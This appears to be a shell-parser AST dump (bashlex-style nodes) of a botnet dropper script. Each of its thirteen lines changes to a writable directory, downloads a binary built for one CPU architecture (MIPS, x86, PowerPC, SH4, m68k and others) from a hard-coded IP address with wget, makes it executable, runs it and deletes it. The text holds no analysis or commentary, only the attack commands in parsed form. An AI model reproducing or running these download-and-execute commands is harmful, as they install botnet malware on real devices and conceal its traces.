ListNode(lineno=2, pos=(12, 161), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 37), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 37), word='/var/system'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(38, 40)),
  CommandNode(lineno=2, pos=(41, 48), parts=[
    WordNode(lineno=2, pos=(41, 43), word='cd'),
    WordNode(lineno=2, pos=(44, 48), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(49, 51)),
  CommandNode(lineno=2, pos=(52, 60), parts=[
    WordNode(lineno=2, pos=(52, 54), word='cd'),
    WordNode(lineno=2, pos=(55, 60), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(61, 63)),
  CommandNode(lineno=2, pos=(64, 68), parts=[
    WordNode(lineno=2, pos=(64, 66), word='cd'),
    WordNode(lineno=2, pos=(67, 68), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(68, 69)),
  CommandNode(lineno=2, pos=(70, 107), parts=[
    WordNode(lineno=2, pos=(70, 74), word='wget'),
    WordNode(lineno=2, pos=(75, 107), word='http://46.183.223.246/jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(107, 108)),
  CommandNode(lineno=2, pos=(109, 128), parts=[
    WordNode(lineno=2, pos=(109, 114), word='chmod'),
    WordNode(lineno=2, pos=(115, 117), word='+x'),
    WordNode(lineno=2, pos=(118, 128), word='jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(128, 129)),
  CommandNode(lineno=2, pos=(130, 142), parts=[
    WordNode(lineno=2, pos=(130, 142), word='./jackmymips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(142, 143)),
  CommandNode(lineno=2, pos=(144, 161), parts=[
    WordNode(lineno=2, pos=(144, 146), word='rm'),
    WordNode(lineno=2, pos=(147, 150), word='-rf'),
    WordNode(lineno=2, pos=(151, 161), word='jackmymips'),
  ]),
])
ListNode(lineno=3, pos=(162, 319), parts=[
  CommandNode(lineno=3, pos=(162, 169), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 169), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(170, 172)),
  CommandNode(lineno=3, pos=(173, 187), parts=[
    WordNode(lineno=3, pos=(173, 175), word='cd'),
    WordNode(lineno=3, pos=(176, 187), word='/var/system'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(188, 190)),
  CommandNode(lineno=3, pos=(191, 198), parts=[
    WordNode(lineno=3, pos=(191, 193), word='cd'),
    WordNode(lineno=3, pos=(194, 198), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(199, 201)),
  CommandNode(lineno=3, pos=(202, 210), parts=[
    WordNode(lineno=3, pos=(202, 204), word='cd'),
    WordNode(lineno=3, pos=(205, 210), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(211, 213)),
  CommandNode(lineno=3, pos=(214, 218), parts=[
    WordNode(lineno=3, pos=(214, 216), word='cd'),
    WordNode(lineno=3, pos=(217, 218), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(218, 219)),
  CommandNode(lineno=3, pos=(220, 259), parts=[
    WordNode(lineno=3, pos=(220, 224), word='wget'),
    WordNode(lineno=3, pos=(225, 259), word='http://46.183.223.246/jackmymips64'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(259, 260)),
  CommandNode(lineno=3, pos=(261, 282), parts=[
    WordNode(lineno=3, pos=(261, 266), word='chmod'),
    WordNode(lineno=3, pos=(267, 269), word='+x'),
    WordNode(lineno=3, pos=(270, 282), word='jackmymips64'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(282, 283)),
  CommandNode(lineno=3, pos=(284, 298), parts=[
    WordNode(lineno=3, pos=(284, 298), word='./jackmymips64'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(298, 299)),
  CommandNode(lineno=3, pos=(300, 319), parts=[
    WordNode(lineno=3, pos=(300, 302), word='rm'),
    WordNode(lineno=3, pos=(303, 306), word='-rf'),
    WordNode(lineno=3, pos=(307, 319), word='jackmymips64'),
  ]),
])
ListNode(lineno=4, pos=(320, 477), parts=[
  CommandNode(lineno=4, pos=(320, 327), parts=[
    WordNode(lineno=4, pos=(320, 322), word='cd'),
    WordNode(lineno=4, pos=(323, 327), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(328, 330)),
  CommandNode(lineno=4, pos=(331, 345), parts=[
    WordNode(lineno=4, pos=(331, 333), word='cd'),
    WordNode(lineno=4, pos=(334, 345), word='/var/system'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(346, 348)),
  CommandNode(lineno=4, pos=(349, 356), parts=[
    WordNode(lineno=4, pos=(349, 351), word='cd'),
    WordNode(lineno=4, pos=(352, 356), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(357, 359)),
  CommandNode(lineno=4, pos=(360, 368), parts=[
    WordNode(lineno=4, pos=(360, 362), word='cd'),
    WordNode(lineno=4, pos=(363, 368), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(369, 371)),
  CommandNode(lineno=4, pos=(372, 376), parts=[
    WordNode(lineno=4, pos=(372, 374), word='cd'),
    WordNode(lineno=4, pos=(375, 376), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(376, 377)),
  CommandNode(lineno=4, pos=(378, 417), parts=[
    WordNode(lineno=4, pos=(378, 382), word='wget'),
    WordNode(lineno=4, pos=(383, 417), word='http://46.183.223.246/jackmymipsel'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(417, 418)),
  CommandNode(lineno=4, pos=(419, 440), parts=[
    WordNode(lineno=4, pos=(419, 424), word='chmod'),
    WordNode(lineno=4, pos=(425, 427), word='+x'),
    WordNode(lineno=4, pos=(428, 440), word='jackmymipsel'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(440, 441)),
  CommandNode(lineno=4, pos=(442, 456), parts=[
    WordNode(lineno=4, pos=(442, 456), word='./jackmymipsel'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(456, 457)),
  CommandNode(lineno=4, pos=(458, 477), parts=[
    WordNode(lineno=4, pos=(458, 460), word='rm'),
    WordNode(lineno=4, pos=(461, 464), word='-rf'),
    WordNode(lineno=4, pos=(465, 477), word='jackmymipsel'),
  ]),
])
ListNode(lineno=5, pos=(478, 631), parts=[
  CommandNode(lineno=5, pos=(478, 485), parts=[
    WordNode(lineno=5, pos=(478, 480), word='cd'),
    WordNode(lineno=5, pos=(481, 485), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(486, 488)),
  CommandNode(lineno=5, pos=(489, 503), parts=[
    WordNode(lineno=5, pos=(489, 491), word='cd'),
    WordNode(lineno=5, pos=(492, 503), word='/var/system'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(504, 506)),
  CommandNode(lineno=5, pos=(507, 514), parts=[
    WordNode(lineno=5, pos=(507, 509), word='cd'),
    WordNode(lineno=5, pos=(510, 514), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(515, 517)),
  CommandNode(lineno=5, pos=(518, 526), parts=[
    WordNode(lineno=5, pos=(518, 520), word='cd'),
    WordNode(lineno=5, pos=(521, 526), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(527, 529)),
  CommandNode(lineno=5, pos=(530, 534), parts=[
    WordNode(lineno=5, pos=(530, 532), word='cd'),
    WordNode(lineno=5, pos=(533, 534), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(534, 535)),
  CommandNode(lineno=5, pos=(536, 574), parts=[
    WordNode(lineno=5, pos=(536, 540), word='wget'),
    WordNode(lineno=5, pos=(541, 574), word='http://46.183.223.246/jackmysh2eb'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(574, 575)),
  CommandNode(lineno=5, pos=(576, 596), parts=[
    WordNode(lineno=5, pos=(576, 581), word='chmod'),
    WordNode(lineno=5, pos=(582, 584), word='+x'),
    WordNode(lineno=5, pos=(585, 596), word='jackmysh2eb'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(596, 597)),
  CommandNode(lineno=5, pos=(598, 611), parts=[
    WordNode(lineno=5, pos=(598, 611), word='./jackmysh2eb'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(611, 612)),
  CommandNode(lineno=5, pos=(613, 631), parts=[
    WordNode(lineno=5, pos=(613, 615), word='rm'),
    WordNode(lineno=5, pos=(616, 619), word='-rf'),
    WordNode(lineno=5, pos=(620, 631), word='jackmysh2eb'),
  ]),
])
ListNode(lineno=6, pos=(632, 789), parts=[
  CommandNode(lineno=6, pos=(632, 639), parts=[
    WordNode(lineno=6, pos=(632, 634), word='cd'),
    WordNode(lineno=6, pos=(635, 639), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(640, 642)),
  CommandNode(lineno=6, pos=(643, 657), parts=[
    WordNode(lineno=6, pos=(643, 645), word='cd'),
    WordNode(lineno=6, pos=(646, 657), word='/var/system'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(658, 660)),
  CommandNode(lineno=6, pos=(661, 668), parts=[
    WordNode(lineno=6, pos=(661, 663), word='cd'),
    WordNode(lineno=6, pos=(664, 668), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(669, 671)),
  CommandNode(lineno=6, pos=(672, 680), parts=[
    WordNode(lineno=6, pos=(672, 674), word='cd'),
    WordNode(lineno=6, pos=(675, 680), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(681, 683)),
  CommandNode(lineno=6, pos=(684, 688), parts=[
    WordNode(lineno=6, pos=(684, 686), word='cd'),
    WordNode(lineno=6, pos=(687, 688), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(688, 689)),
  CommandNode(lineno=6, pos=(690, 729), parts=[
    WordNode(lineno=6, pos=(690, 694), word='wget'),
    WordNode(lineno=6, pos=(695, 729), word='http://46.183.223.246/jackmysh2elf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(729, 730)),
  CommandNode(lineno=6, pos=(731, 752), parts=[
    WordNode(lineno=6, pos=(731, 736), word='chmod'),
    WordNode(lineno=6, pos=(737, 739), word='+x'),
    WordNode(lineno=6, pos=(740, 752), word='jackmysh2elf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(752, 753)),
  CommandNode(lineno=6, pos=(754, 768), parts=[
    WordNode(lineno=6, pos=(754, 768), word='./jackmysh2elf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(768, 769)),
  CommandNode(lineno=6, pos=(770, 789), parts=[
    WordNode(lineno=6, pos=(770, 772), word='rm'),
    WordNode(lineno=6, pos=(773, 776), word='-rf'),
    WordNode(lineno=6, pos=(777, 789), word='jackmysh2elf'),
  ]),
])
ListNode(lineno=7, pos=(790, 935), parts=[
  CommandNode(lineno=7, pos=(790, 797), parts=[
    WordNode(lineno=7, pos=(790, 792), word='cd'),
    WordNode(lineno=7, pos=(793, 797), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(798, 800)),
  CommandNode(lineno=7, pos=(801, 815), parts=[
    WordNode(lineno=7, pos=(801, 803), word='cd'),
    WordNode(lineno=7, pos=(804, 815), word='/var/system'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(816, 818)),
  CommandNode(lineno=7, pos=(819, 826), parts=[
    WordNode(lineno=7, pos=(819, 821), word='cd'),
    WordNode(lineno=7, pos=(822, 826), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(827, 829)),
  CommandNode(lineno=7, pos=(830, 838), parts=[
    WordNode(lineno=7, pos=(830, 832), word='cd'),
    WordNode(lineno=7, pos=(833, 838), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(839, 841)),
  CommandNode(lineno=7, pos=(842, 846), parts=[
    WordNode(lineno=7, pos=(842, 844), word='cd'),
    WordNode(lineno=7, pos=(845, 846), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(846, 847)),
  CommandNode(lineno=7, pos=(848, 884), parts=[
    WordNode(lineno=7, pos=(848, 852), word='wget'),
    WordNode(lineno=7, pos=(853, 884), word='http://46.183.223.246/jackmysh4'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(884, 885)),
  CommandNode(lineno=7, pos=(886, 904), parts=[
    WordNode(lineno=7, pos=(886, 891), word='chmod'),
    WordNode(lineno=7, pos=(892, 894), word='+x'),
    WordNode(lineno=7, pos=(895, 904), word='jackmysh4'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(904, 905)),
  CommandNode(lineno=7, pos=(906, 917), parts=[
    WordNode(lineno=7, pos=(906, 917), word='./jackmysh4'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(917, 918)),
  CommandNode(lineno=7, pos=(919, 935), parts=[
    WordNode(lineno=7, pos=(919, 921), word='rm'),
    WordNode(lineno=7, pos=(922, 925), word='-rf'),
    WordNode(lineno=7, pos=(926, 935), word='jackmysh4'),
  ]),
])
ListNode(lineno=8, pos=(936, 1081), parts=[
  CommandNode(lineno=8, pos=(936, 943), parts=[
    WordNode(lineno=8, pos=(936, 938), word='cd'),
    WordNode(lineno=8, pos=(939, 943), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(944, 946)),
  CommandNode(lineno=8, pos=(947, 961), parts=[
    WordNode(lineno=8, pos=(947, 949), word='cd'),
    WordNode(lineno=8, pos=(950, 961), word='/var/system'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(962, 964)),
  CommandNode(lineno=8, pos=(965, 972), parts=[
    WordNode(lineno=8, pos=(965, 967), word='cd'),
    WordNode(lineno=8, pos=(968, 972), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(973, 975)),
  CommandNode(lineno=8, pos=(976, 984), parts=[
    WordNode(lineno=8, pos=(976, 978), word='cd'),
    WordNode(lineno=8, pos=(979, 984), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(985, 987)),
  CommandNode(lineno=8, pos=(988, 992), parts=[
    WordNode(lineno=8, pos=(988, 990), word='cd'),
    WordNode(lineno=8, pos=(991, 992), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(992, 993)),
  CommandNode(lineno=8, pos=(994, 1030), parts=[
    WordNode(lineno=8, pos=(994, 998), word='wget'),
    WordNode(lineno=8, pos=(999, 1030), word='http://46.183.223.246/jackmyx86'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1030, 1031)),
  CommandNode(lineno=8, pos=(1032, 1050), parts=[
    WordNode(lineno=8, pos=(1032, 1037), word='chmod'),
    WordNode(lineno=8, pos=(1038, 1040), word='+x'),
    WordNode(lineno=8, pos=(1041, 1050), word='jackmyx86'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1050, 1051)),
  CommandNode(lineno=8, pos=(1052, 1063), parts=[
    WordNode(lineno=8, pos=(1052, 1063), word='./jackmyx86'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1063, 1064)),
  CommandNode(lineno=8, pos=(1065, 1081), parts=[
    WordNode(lineno=8, pos=(1065, 1067), word='rm'),
    WordNode(lineno=8, pos=(1068, 1071), word='-rf'),
    WordNode(lineno=8, pos=(1072, 1081), word='jackmyx86'),
  ]),
])
ListNode(lineno=9, pos=(1082, 1231), parts=[
  CommandNode(lineno=9, pos=(1082, 1089), parts=[
    WordNode(lineno=9, pos=(1082, 1084), word='cd'),
    WordNode(lineno=9, pos=(1085, 1089), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1090, 1092)),
  CommandNode(lineno=9, pos=(1093, 1107), parts=[
    WordNode(lineno=9, pos=(1093, 1095), word='cd'),
    WordNode(lineno=9, pos=(1096, 1107), word='/var/system'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1108, 1110)),
  CommandNode(lineno=9, pos=(1111, 1118), parts=[
    WordNode(lineno=9, pos=(1111, 1113), word='cd'),
    WordNode(lineno=9, pos=(1114, 1118), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1119, 1121)),
  CommandNode(lineno=9, pos=(1122, 1130), parts=[
    WordNode(lineno=9, pos=(1122, 1124), word='cd'),
    WordNode(lineno=9, pos=(1125, 1130), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1131, 1133)),
  CommandNode(lineno=9, pos=(1134, 1138), parts=[
    WordNode(lineno=9, pos=(1134, 1136), word='cd'),
    WordNode(lineno=9, pos=(1137, 1138), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1138, 1139)),
  CommandNode(lineno=9, pos=(1140, 1177), parts=[
    WordNode(lineno=9, pos=(1140, 1144), word='wget'),
    WordNode(lineno=9, pos=(1145, 1177), word='http://46.183.223.246/jackmyi486'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1177, 1178)),
  CommandNode(lineno=9, pos=(1179, 1198), parts=[
    WordNode(lineno=9, pos=(1179, 1184), word='chmod'),
    WordNode(lineno=9, pos=(1185, 1187), word='+x'),
    WordNode(lineno=9, pos=(1188, 1198), word='jackmyi486'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1198, 1199)),
  CommandNode(lineno=9, pos=(1200, 1212), parts=[
    WordNode(lineno=9, pos=(1200, 1212), word='./jackmyi486'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1212, 1213)),
  CommandNode(lineno=9, pos=(1214, 1231), parts=[
    WordNode(lineno=9, pos=(1214, 1216), word='rm'),
    WordNode(lineno=9, pos=(1217, 1220), word='-rf'),
    WordNode(lineno=9, pos=(1221, 1231), word='jackmyi486'),
  ]),
])
ListNode(lineno=10, pos=(1232, 1381), parts=[
  CommandNode(lineno=10, pos=(1232, 1239), parts=[
    WordNode(lineno=10, pos=(1232, 1234), word='cd'),
    WordNode(lineno=10, pos=(1235, 1239), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1240, 1242)),
  CommandNode(lineno=10, pos=(1243, 1257), parts=[
    WordNode(lineno=10, pos=(1243, 1245), word='cd'),
    WordNode(lineno=10, pos=(1246, 1257), word='/var/system'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1258, 1260)),
  CommandNode(lineno=10, pos=(1261, 1268), parts=[
    WordNode(lineno=10, pos=(1261, 1263), word='cd'),
    WordNode(lineno=10, pos=(1264, 1268), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1269, 1271)),
  CommandNode(lineno=10, pos=(1272, 1280), parts=[
    WordNode(lineno=10, pos=(1272, 1274), word='cd'),
    WordNode(lineno=10, pos=(1275, 1280), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1281, 1283)),
  CommandNode(lineno=10, pos=(1284, 1288), parts=[
    WordNode(lineno=10, pos=(1284, 1286), word='cd'),
    WordNode(lineno=10, pos=(1287, 1288), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1288, 1289)),
  CommandNode(lineno=10, pos=(1290, 1327), parts=[
    WordNode(lineno=10, pos=(1290, 1294), word='wget'),
    WordNode(lineno=10, pos=(1295, 1327), word='http://46.183.223.246/jackmyi586'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1327, 1328)),
  CommandNode(lineno=10, pos=(1329, 1348), parts=[
    WordNode(lineno=10, pos=(1329, 1334), word='chmod'),
    WordNode(lineno=10, pos=(1335, 1337), word='+x'),
    WordNode(lineno=10, pos=(1338, 1348), word='jackmyi586'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1348, 1349)),
  CommandNode(lineno=10, pos=(1350, 1362), parts=[
    WordNode(lineno=10, pos=(1350, 1362), word='./jackmyi586'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1362, 1363)),
  CommandNode(lineno=10, pos=(1364, 1381), parts=[
    WordNode(lineno=10, pos=(1364, 1366), word='rm'),
    WordNode(lineno=10, pos=(1367, 1370), word='-rf'),
    WordNode(lineno=10, pos=(1371, 1381), word='jackmyi586'),
  ]),
])
ListNode(lineno=11, pos=(1382, 1531), parts=[
  CommandNode(lineno=11, pos=(1382, 1389), parts=[
    WordNode(lineno=11, pos=(1382, 1384), word='cd'),
    WordNode(lineno=11, pos=(1385, 1389), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1390, 1392)),
  CommandNode(lineno=11, pos=(1393, 1407), parts=[
    WordNode(lineno=11, pos=(1393, 1395), word='cd'),
    WordNode(lineno=11, pos=(1396, 1407), word='/var/system'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1408, 1410)),
  CommandNode(lineno=11, pos=(1411, 1418), parts=[
    WordNode(lineno=11, pos=(1411, 1413), word='cd'),
    WordNode(lineno=11, pos=(1414, 1418), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1419, 1421)),
  CommandNode(lineno=11, pos=(1422, 1430), parts=[
    WordNode(lineno=11, pos=(1422, 1424), word='cd'),
    WordNode(lineno=11, pos=(1425, 1430), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1431, 1433)),
  CommandNode(lineno=11, pos=(1434, 1438), parts=[
    WordNode(lineno=11, pos=(1434, 1436), word='cd'),
    WordNode(lineno=11, pos=(1437, 1438), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1438, 1439)),
  CommandNode(lineno=11, pos=(1440, 1477), parts=[
    WordNode(lineno=11, pos=(1440, 1444), word='wget'),
    WordNode(lineno=11, pos=(1445, 1477), word='http://46.183.223.246/jackmyi686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1477, 1478)),
  CommandNode(lineno=11, pos=(1479, 1498), parts=[
    WordNode(lineno=11, pos=(1479, 1484), word='chmod'),
    WordNode(lineno=11, pos=(1485, 1487), word='+x'),
    WordNode(lineno=11, pos=(1488, 1498), word='jackmyi686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1498, 1499)),
  CommandNode(lineno=11, pos=(1500, 1512), parts=[
    WordNode(lineno=11, pos=(1500, 1512), word='./jackmyi686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1512, 1513)),
  CommandNode(lineno=11, pos=(1514, 1531), parts=[
    WordNode(lineno=11, pos=(1514, 1516), word='rm'),
    WordNode(lineno=11, pos=(1517, 1520), word='-rf'),
    WordNode(lineno=11, pos=(1521, 1531), word='jackmyi686'),
  ]),
])
ListNode(lineno=12, pos=(1532, 1693), parts=[
  CommandNode(lineno=12, pos=(1532, 1539), parts=[
    WordNode(lineno=12, pos=(1532, 1534), word='cd'),
    WordNode(lineno=12, pos=(1535, 1539), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1540, 1542)),
  CommandNode(lineno=12, pos=(1543, 1557), parts=[
    WordNode(lineno=12, pos=(1543, 1545), word='cd'),
    WordNode(lineno=12, pos=(1546, 1557), word='/var/system'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1558, 1560)),
  CommandNode(lineno=12, pos=(1561, 1568), parts=[
    WordNode(lineno=12, pos=(1561, 1563), word='cd'),
    WordNode(lineno=12, pos=(1564, 1568), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1569, 1571)),
  CommandNode(lineno=12, pos=(1572, 1580), parts=[
    WordNode(lineno=12, pos=(1572, 1574), word='cd'),
    WordNode(lineno=12, pos=(1575, 1580), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1581, 1583)),
  CommandNode(lineno=12, pos=(1584, 1588), parts=[
    WordNode(lineno=12, pos=(1584, 1586), word='cd'),
    WordNode(lineno=12, pos=(1587, 1588), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1588, 1589)),
  CommandNode(lineno=12, pos=(1590, 1630), parts=[
    WordNode(lineno=12, pos=(1590, 1594), word='wget'),
    WordNode(lineno=12, pos=(1595, 1630), word='http://46.183.223.246/jackmypowerpc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1630, 1631)),
  CommandNode(lineno=12, pos=(1632, 1654), parts=[
    WordNode(lineno=12, pos=(1632, 1637), word='chmod'),
    WordNode(lineno=12, pos=(1638, 1640), word='+x'),
    WordNode(lineno=12, pos=(1641, 1654), word='jackmypowerpc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1654, 1655)),
  CommandNode(lineno=12, pos=(1656, 1671), parts=[
    WordNode(lineno=12, pos=(1656, 1671), word='./jackmypowerpc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1671, 1672)),
  CommandNode(lineno=12, pos=(1673, 1693), parts=[
    WordNode(lineno=12, pos=(1673, 1675), word='rm'),
    WordNode(lineno=12, pos=(1676, 1679), word='-rf'),
    WordNode(lineno=12, pos=(1680, 1693), word='jackmypowerpc'),
  ]),
])
ListNode(lineno=13, pos=(1694, 1875), parts=[
  CommandNode(lineno=13, pos=(1694, 1701), parts=[
    WordNode(lineno=13, pos=(1694, 1696), word='cd'),
    WordNode(lineno=13, pos=(1697, 1701), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1702, 1704)),
  CommandNode(lineno=13, pos=(1705, 1719), parts=[
    WordNode(lineno=13, pos=(1705, 1707), word='cd'),
    WordNode(lineno=13, pos=(1708, 1719), word='/var/system'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1720, 1722)),
  CommandNode(lineno=13, pos=(1723, 1730), parts=[
    WordNode(lineno=13, pos=(1723, 1725), word='cd'),
    WordNode(lineno=13, pos=(1726, 1730), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1731, 1733)),
  CommandNode(lineno=13, pos=(1734, 1742), parts=[
    WordNode(lineno=13, pos=(1734, 1736), word='cd'),
    WordNode(lineno=13, pos=(1737, 1742), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1743, 1745)),
  CommandNode(lineno=13, pos=(1746, 1750), parts=[
    WordNode(lineno=13, pos=(1746, 1748), word='cd'),
    WordNode(lineno=13, pos=(1749, 1750), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1750, 1751)),
  CommandNode(lineno=13, pos=(1752, 1797), parts=[
    WordNode(lineno=13, pos=(1752, 1756), word='wget'),
    WordNode(lineno=13, pos=(1757, 1797), word='http://46.183.223.246/jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1797, 1798)),
  CommandNode(lineno=13, pos=(1799, 1826), parts=[
    WordNode(lineno=13, pos=(1799, 1804), word='chmod'),
    WordNode(lineno=13, pos=(1805, 1807), word='+x'),
    WordNode(lineno=13, pos=(1808, 1826), word='jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1826, 1827)),
  CommandNode(lineno=13, pos=(1828, 1848), parts=[
    WordNode(lineno=13, pos=(1828, 1848), word='./jackmypowerpc440fp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1848, 1849)),
  CommandNode(lineno=13, pos=(1850, 1875), parts=[
    WordNode(lineno=13, pos=(1850, 1852), word='rm'),
    WordNode(lineno=13, pos=(1853, 1856), word='-rf'),
    WordNode(lineno=13, pos=(1857, 1875), word='jackmypowerpc440fp'),
  ]),
])
ListNode(lineno=14, pos=(1876, 2025), parts=[
  CommandNode(lineno=14, pos=(1876, 1883), parts=[
    WordNode(lineno=14, pos=(1876, 1878), word='cd'),
    WordNode(lineno=14, pos=(1879, 1883), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1884, 1886)),
  CommandNode(lineno=14, pos=(1887, 1901), parts=[
    WordNode(lineno=14, pos=(1887, 1889), word='cd'),
    WordNode(lineno=14, pos=(1890, 1901), word='/var/system'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1902, 1904)),
  CommandNode(lineno=14, pos=(1905, 1912), parts=[
    WordNode(lineno=14, pos=(1905, 1907), word='cd'),
    WordNode(lineno=14, pos=(1908, 1912), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1913, 1915)),
  CommandNode(lineno=14, pos=(1916, 1924), parts=[
    WordNode(lineno=14, pos=(1916, 1918), word='cd'),
    WordNode(lineno=14, pos=(1919, 1924), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1925, 1927)),
  CommandNode(lineno=14, pos=(1928, 1932), parts=[
    WordNode(lineno=14, pos=(1928, 1930), word='cd'),
    WordNode(lineno=14, pos=(1931, 1932), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1932, 1933)),
  CommandNode(lineno=14, pos=(1934, 1971), parts=[
    WordNode(lineno=14, pos=(1934, 1938), word='wget'),
    WordNode(lineno=14, pos=(1939, 1971), word='http://46.183.223.246/jackmym86k'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1971, 1972)),
  CommandNode(lineno=14, pos=(1973, 1992), parts=[
    WordNode(lineno=14, pos=(1973, 1978), word='chmod'),
    WordNode(lineno=14, pos=(1979, 1981), word='+x'),
    WordNode(lineno=14, pos=(1982, 1992), word='jackmym86k'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1992, 1993)),
  CommandNode(lineno=14, pos=(1994, 2006), parts=[
    WordNode(lineno=14, pos=(1994, 2006), word='./jackmym86k'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2006, 2007)),
  CommandNode(lineno=14, pos=(2008, 2025), parts=[
    WordNode(lineno=14, pos=(2008, 2010), word='rm'),
    WordNode(lineno=14, pos=(2011, 2014), word='-rf'),
    WordNode(lineno=14, pos=(2015, 2025), word='jackmym86k'),
  ]),
])
